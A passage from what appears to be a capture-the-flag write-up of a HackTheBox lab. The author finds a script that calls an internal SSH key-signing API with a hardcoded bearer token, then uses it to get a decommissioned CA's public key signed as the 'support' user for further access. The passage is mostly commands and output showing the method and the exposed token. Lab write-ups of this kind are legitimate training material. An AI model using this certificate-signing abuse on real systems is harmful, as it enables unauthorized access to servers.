Sign Key API
zzinter@itrc:~$ ll
total 32K
4.0K drwx------ 1 zzinter zzinter 4.0K Aug 5 15:43 .
4.0K -rw-r----- 1 root zzinter 33 Aug 5 15:41 user.txt
0 lrwxrwxrwx 1 root root 9 Jul 23 14:22 .bash_history -> /dev/null
8.0K drwxr-xr-x 1 root root 4.0K Jul 23 14:22 ..
4.0K -rw-r--r-- 1 zzinter zzinter 220 Mar 29 19:40 .bash_logout
4.0K -rw-r--r-- 1 zzinter zzinter 3.5K Mar 29 19:40 .bashrc
4.0K -rw-r--r-- 1 zzinter zzinter 807 Mar 29 19:40 .profile
4.0K -rw-rw-r-- 1 root root 1.2K Feb 19 16:43 sign_key_api.shUpon gaining the lateral movement to the zzinter user, a bash script has been identified in the home directory; sign_key_api.sh
zzinter@itrc:~$ cat sign_key_api.sh
#!/bin/bash
usage () {
echo "Usage: $0 <public_key_file> <username> <principal>"
exit 1
}
if [ "$#" -ne 3 ]; then
usage
fi
public_key_file="$1"
username="$2"
principal_str="$3"
supported_principals="webserver,analytics,support,security"
IFS=',' read -ra principal <<< "$principal_str"
for word in "${principal[@]}"; do
if ! echo "$supported_principals" | grep -qw "$word"; then
echo "Error: '$word' is not a supported principal."
echo "Choose from:"
echo " webserver - external web servers - webadmin user"
echo " analytics - analytics team databases - analytics user"
echo " support - IT support server - support user"
echo " security - SOC servers - support user"
echo
usage
fi
done
if [ ! -f "$public_key_file" ]; then
echo "Error: Public key file '$public_key_file' not found."
usage
fi
public_key=$(cat $public_key_file)
curl -s signserv.ssg.htb/v1/sign -d '{"pubkey": "'"$public_key"'", "username": "'"$username"'", "principals": "'"$principal"'"}' -H "Content-Type: application/json" -H "Authorization:Bearer 7Tqx6owMLtnt6oeR2ORbWmOPk30z4ZH901kH6UUT6vNziNqGrYgmSve5jCmnPJDE"The bash script appears to connect to the API endpoint, hosted by the signserv.ssg.htb host
- The API endpoint was initially discovered, yet I was unable to proceed as it requires an authorization header
- Additionally, the bash script was mentioned in the messages that it handles signing public keys with the appropriate principal to validate
- Another important thing to note here is that the server will trust both the old and the new
- This would essentially mean that I can use this bash script to sign the decommissioned CA’s key
┌──(kali㉿kali)-[~/…/htb/labs/resource/decommission_old_ca]
└─$ scp -o CertificateFile=zzinter-itrc-cert.pub -i ca-itrc ca-itrc zzinter@$IP:~/
ca-itrc 100% 2602 125.8KB/s 00:00
┌──(kali㉿kali)-[~/…/htb/labs/resource/decommission_old_ca]
└─$ scp -o CertificateFile=zzinter-itrc-cert.pub -i ca-itrc ca-itrc.pub zzinter@$IP:~/
ca-itrc.pub 100% 572 7.8KB/s 00:00I will first transfer the keypair of CA
zzinter@itrc:~$ bash ./sign_key_api.sh ca-itrc.pub blah blah
Error: 'blah' is not a supported principal.
Choose from:
webserver - external web servers - webadmin user
analytics - analytics team databases - analytics user
support - IT support server - support user
security - SOC servers - support user
Usage: ./sign_key_api.sh <public_key_file> <username> <principal>The bash script itself takes 3 arguments It is known at this point that the CA’s public key can be used There are 4 principals and 3 users
zzinter@itrc:~$ bash ./sign_key_api.sh ca-itrc.pub support support > support-support.pubAfter many attempt, I found out that the only working combination is the support user with the support pricinpal. There were other known users too. None of them worked
I will use the signed public key and private key to authenticate to the target system